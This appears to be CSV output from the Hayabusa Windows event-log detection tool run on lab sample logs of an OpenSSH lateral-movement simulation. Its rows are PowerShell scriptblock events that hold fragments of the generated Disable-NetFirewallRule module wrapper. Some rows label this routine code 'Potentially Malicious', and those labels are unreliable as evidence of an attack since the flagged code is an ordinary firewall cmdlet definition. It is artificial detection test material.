${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:37.905 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, 
[Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() 
$__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:37.905 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) 
$__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 
'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetFirewallRule' -Alias 
'*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:37.905 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if 
